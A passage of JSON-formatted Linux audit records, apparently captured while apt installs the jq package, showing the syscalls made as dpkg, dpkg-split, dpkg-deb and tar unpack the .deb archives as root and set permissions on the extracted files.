"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.829:535",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bc70",
"0x7ffef7ae42e0",
"0x7ffef7ae42e0",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.829:536",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7624,
"pid": 7634,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40a0",
"0x7ffef7ae4160",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/dpkg-split",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.829:537",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7634,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg-split",
"exe": "/usr/bin/dpkg-split",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40a0",
"0x7ffef7ae4160",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"dpkg-split",
"-Qao",
"/var/lib/dpkg/reassemble.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg-split",
"inode": 787056,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.829:538",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba6c9130",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x556eba297010"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.829:539",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7624,
"pid": 7635,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40a0",
"0x7ffef7ae4160",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/dpkg-deb",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.829:540",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7635,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg-deb",
"exe": "/usr/bin/dpkg-deb",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40a0",
"0x7ffef7ae4160",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg-deb",
"inode": 787052,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.829:541",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7635,
"pid": 7638,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg-deb",
"exe": "/usr/bin/dpkg-deb",
"key": "rootcmd",
"ARGV": [
"0x7fff00f62e20",
"0x55cc32e51510",
"0x7fff00f631d0",
"0x7fcb2d9ea740"
]
},
"CWD": {
"cwd": "/var/lib/dpkg/tmp.ci"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/tar",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.829,
"ppid": 7624
}
}
{
"ID": "1632470477.833:542",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7635,
"pid": 7638,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "rootcmd",
"ARGV": [
"0x7fff00f62e20",
"0x55cc32e51510",
"0x7fff00f631d0",
"0x7fcb2d9ea740"
]
},
"EXECVE": {
"argc": 5,
"ARGV": [
"tar",
"-x",
"-f",
"-",
"--warning=no-timestamp"
]
},
"CWD": {
"cwd": "/var/lib/dpkg/tmp.ci"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/tar",
"inode": 787546,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.829,
"ppid": 7624
}
}
{
"ID": "1632470477.837:543",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7635,
"pid": 7638,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x0",
"0x0",
"0x1ff"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 276990,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.829,
"ppid": 7624
}
}
{
"ID": "1632470477.837:544",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7635,
"pid": 7638,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x1a4",
"0x1a4",
"0x0"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 276990,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.829,
"ppid": 7624
}
}
{
"ID": "1632470477.837:545",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7635,
"pid": 7638,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x0",
"0x0",
"0x1ff"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277165,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.829,
"ppid": 7624
}
}
{
"ID": "1632470477.837:546",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7635,
"pid": 7638,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x1a4",
"0x1a4",
"0x0"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277165,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.829,
"ppid": 7624
}
}
{
"ID": "1632470477.837:547",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7635,
"pid": 7638,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x0",
"0x0",
"0x1ff"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277171,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.829,
"ppid": 7624
}
}
{
"ID": "1632470477.837:548",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7635,
"pid": 7638,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x1a4",
"0x1a4",
"0x0"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277171,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.829,
"ppid": 7624
}
}
{
"ID": "1632470477.837:549",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7635,
"pid": 7638,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x0",
"0x0",
"0x1ff"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277172,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.829,
"ppid": 7624
}
}
{
"ID": "1632470477.837:550",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7635,
"pid": 7638,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x1a4",
"0x1a4",
"0x0"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277172,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.829,
"ppid": 7624
}
}
{
"ID": "1632470477.837:551",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7635,
"pid": 7638,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x0",
"0x0",
"0x1ff"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277174,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.829,
"ppid": 7624
}
}
{
"ID": "1632470477.837:552",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7635,
"pid": 7638,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0x3",
"0x1a4",
"0x1a4",
"0x0"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277174,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.829,
"ppid": 7624
}
}
{
"ID": "1632470477.837:553",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 260,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7635,
"pid": 7638,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "tar",
"exe": "/usr/bin/tar",
"key": "perm_mod",
"ARGV": [
"0xffffff9c",
"0x55ee7a629350",
"0x0",
"0x0"
]
},
"CWD": {
"cwd": "/var/lib/dpkg/tmp.ci"
},
"PATH": [
{
"item": 0,
"name": ".",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"PARENT_INFO": {
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
],
"launch_time": 1632470477.829,
"ppid": 7624
}
}
{
"ID": "1632470477.861:554",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b7e0",
"0x556eba29b810",
"0x556eba29b82a",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277163,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0004",
"inode": 277163,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
